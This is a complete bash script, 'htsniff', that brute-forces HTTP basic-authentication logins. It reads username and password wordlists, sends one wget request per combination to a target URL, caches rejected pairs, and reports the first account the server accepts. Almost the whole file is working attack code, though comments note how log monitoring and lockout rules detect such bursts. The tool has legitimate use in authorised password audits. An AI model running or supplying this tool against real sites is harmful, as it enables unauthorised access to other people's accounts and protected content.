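#!/bin/bash
#
# written by jens heine bluemelvin_at_web.de 2005
#
# htsniff: check a HTTP basic-auth protected url against a list of
# username/password combinations and report the first one the server
# accepts.
#
# Every password candidate is tried for every username; the usernames
# themselves are also used as password candidates.
#
# Exit status: 0  valid account found, or the url needs no password
#              1  url unreachable / not found, bad input file, interrupted
#              2  all combinations tried, no match
#
# Files: $HOME/.htsniff/<url>/checked_accounts.log caches rejected
# "user:password" pairs in plain text so a later run can skip them
# (disable with -i). The folder is therefore created owner-only.
#
# Seen from the server, a run is one request per combination from a single
# client, each rejected until a match; that burst of failed logins is what
# access-log monitoring and lockout/rate-limit rules key on.
#
TARGET_URL="http://localhost"
USERAGENT="Mozilla/4.0"
USERNAME=""
PASSWORD=""
USERNAMEFILE="usernamefile"
PASSWDFILE="passwdfile"
DEBUG=0
TMPFOLDER="$HOME/.htsniff"
WGETLOGFILE="$TMPFOLDER/wget.tmp"
ATTEMPSCACHELOGFILE="checked_accounts.log"
IGNORE_CACHE=0

helptext="\nhtsniff version 0.3 by jens heine bluemelvin_at_web.de (2005) \
\nUsage: htsniff [-t url][-a user-agent][-u usernamefile]\
[-p passwdfile][-i ignore-cache][-?]\n \
[-v[v] verbose]\n\n"

while getopts "t:a:u:p:?vi" optn; do
  case $optn in
    t) TARGET_URL="$OPTARG" ;;
    a) USERAGENT="$OPTARG" ;;
    u) USERNAMEFILE="$OPTARG" ;;
    p) PASSWDFILE="$OPTARG" ;;
    v) DEBUG=$((DEBUG + 1)) ;;   # each -v raises the verbosity by one
    i) IGNORE_CACHE=1 ;;
    \?)
      # '%b' keeps the \n escapes working without using the text as a
      # printf format string.
      printf '%b' "$helptext"
      exit 1
      ;;
  esac
done

#
# functions
#

# Print a message when the verbosity is high enough.
# Arguments: $1 - minimum verbosity (number of -v flags), $2 - text
log() {
  if [ "$DEBUG" -ge "$1" ]; then
    echo "$2"
  fi
}

# Remove the temporary wget log. Never fails and never prints anything.
cleanup() {
  rm -f -- "$WGETLOGFILE" >/dev/null 2>&1
}

# Succeed when the wget log exists, is non-empty and contains the literal
# text $1 (case-insensitive).
wgetLogContains() {
  [ -s "$WGETLOGFILE" ] && grep -Fqi -- "$1" "$WGETLOGFILE"
}

# Probe the url once without credentials.
# Arguments: $1 - url
# Exits 1 when the url cannot be reached or is not found, exits 0 when the
# server does not ask for a password; returns normally otherwise.
checkUrl() {
  local url=$1

  rm -f -- "$WGETLOGFILE"
  log 2 "Trying to connect to url."
  wget -O /dev/null -U "$USERAGENT" -o "$WGETLOGFILE" "$url"

  # NOTE(review): this is wget's German "connection refused" message; under
  # any other locale the check never matches - confirm the intended LANG.
  if wgetLogContains "verbindungsaufbau abgelehnt"; then
    echo "Can not connect to url: \"$url\""
    cleanup
    exit 1
  fi
  if wgetLogContains "404 not found"; then
    echo "Server could not find url: \"$url\""
    cleanup
    exit 1
  fi

  log 2 "Checking password protection of url."
  # NOTE(review): only the reason phrase "Authorization Required" is
  # recognised; a server that sends a different phrase with its 401 is
  # reported as unprotected below.
  if wgetLogContains "401 Authorization Required"; then
    log 2 "Url \"$url\" checked. Password required to access site."
  else
    echo "Url \"$url\" checked. No password neccessary to access this site."
    exit 0
  fi
}

# Print the attempts-per-second rate.
# Arguments: $1 - start time in seconds since the epoch, $2 - total attempts
printRateStatistics() {
  local stop_time elapsed_time rate

  stop_time=$(date +%s)
  elapsed_time=$((stop_time - $1))
  # A run that ends within the same second would make bc divide by zero.
  if [ "$elapsed_time" -lt 1 ]; then
    elapsed_time=1
  fi
  rate=$(echo "scale=2;$2 / $elapsed_time" | bc)
  echo "Rate: $rate attempts/second"
}

#
# Main
#

# The cache below holds tested credentials in plain text: keep everything
# this script creates readable by the owner only.
umask 077
mkdir -p "$TMPFOLDER"
chmod 700 "$TMPFOLDER"
# NOTE(review): the url is used verbatim as a sub-directory name, so
# "http://host/path" becomes several nested folders under $TMPFOLDER.
mkdir -p "$TMPFOLDER/$TARGET_URL"
CACHEFILE="$TMPFOLDER/$TARGET_URL/$ATTEMPSCACHELOGFILE"

if [ ! -f "$USERNAMEFILE" ] || [ "$(wc -l < "$USERNAMEFILE")" -eq 0 ]; then
  echo "Usernamefile not found or empty: $USERNAMEFILE"
  exit 1
fi
if [ ! -f "$PASSWDFILE" ] || [ "$(wc -l < "$PASSWDFILE")" -eq 0 ]; then
  echo "Password file not found or empty: $PASSWDFILE"
  exit 1
fi

log 1 "Checking usernamefile : $(wc -l < "$USERNAMEFILE") user(s)."
log 1 "Checking passwdfile : $(wc -l < "$PASSWDFILE") passwords."
log 1 "Target url : $TARGET_URL"
if [ -s "$CACHEFILE" ]; then
  log 1 "Failed tries : $(wc -l < "$CACHEFILE")"
fi

checkUrl "$TARGET_URL"

attempt_counter=0
start_time=$(date +%s)
trap 'echo;printRateStatistics "$start_time" "$attempt_counter";cleanup;exit 1' INT

# The lists are read line by line on their own file descriptors instead of
# through unquoted $(cat ...): that form word-splits every entry and
# glob-expands entries such as "*" into the names of local files.
while IFS= read -r USERNAME <&3; do
  [ -n "$USERNAME" ] || continue
  while IFS= read -r PASSWORD <&4; do
    [ -n "$PASSWORD" ] || continue

    if [ "$IGNORE_CACHE" -eq 0 ]; then
      # -F: compare the pair literally; as a regex, characters such as "."
      # or "*" in a credential would match unrelated cache entries.
      if grep -Fxq -- "$USERNAME:$PASSWORD" "$CACHEFILE" 2>/dev/null; then
        log 3 "Skipping combination \"$USERNAME:$PASSWORD\". This account has been checked before."
        printf 'x'
        continue
      fi
    fi

    attempt_counter=$((attempt_counter + 1))
    log 2 "$attempt_counter. Trying to login with $USERNAME:$PASSWORD"
    printf '.'
    rm -f -- "$WGETLOGFILE"
    # NOTE(review): the candidate password is passed as a wget argument and
    # is visible in the local process list while the request runs.
    wget -O /dev/null -U "$USERAGENT" --http-user="$USERNAME" \
      --http-passwd="$PASSWORD" -o "$WGETLOGFILE" "$TARGET_URL"
    attempt_result=$?
    log 3 "wget result: $attempt_result"

    if wgetLogContains "verbindungsaufbau abgelehnt"; then
      echo "Can not connect to url: \"$TARGET_URL\""
      printRateStatistics "$start_time" "$attempt_counter"
      cleanup
      exit 1
    fi
    if wgetLogContains "404 not found"; then
      echo "Server could not find url: \"$TARGET_URL\""
      printRateStatistics "$start_time" "$attempt_counter"
      cleanup
      exit 1
    fi

    # wget exits 0 only when the server delivered the page.
    if [ "$attempt_result" -eq 0 ]; then
      echo
      echo "************************************"
      echo "Valid account found. Access granted."
      echo "Account >>> $USERNAME:$PASSWORD <<<"
      echo "Total accounts tested: $attempt_counter"
      printRateStatistics "$start_time" "$attempt_counter"
      echo "************************************"
      cleanup
      exit 0
    fi

    # Remember the rejected pair so the next run can skip it.
    echo "$USERNAME:$PASSWORD" >> "$CACHEFILE"
  done 4< <(cat -- "$USERNAMEFILE" "$PASSWDFILE" | sort -u)
done 3< <(sort -u -- "$USERNAMEFILE")

echo
printRateStatistics "$start_time" "$attempt_counter"
echo "$attempt_counter accounts checked. No match found."
echo "Sorry. Try more accounts."
cleanup
exit 2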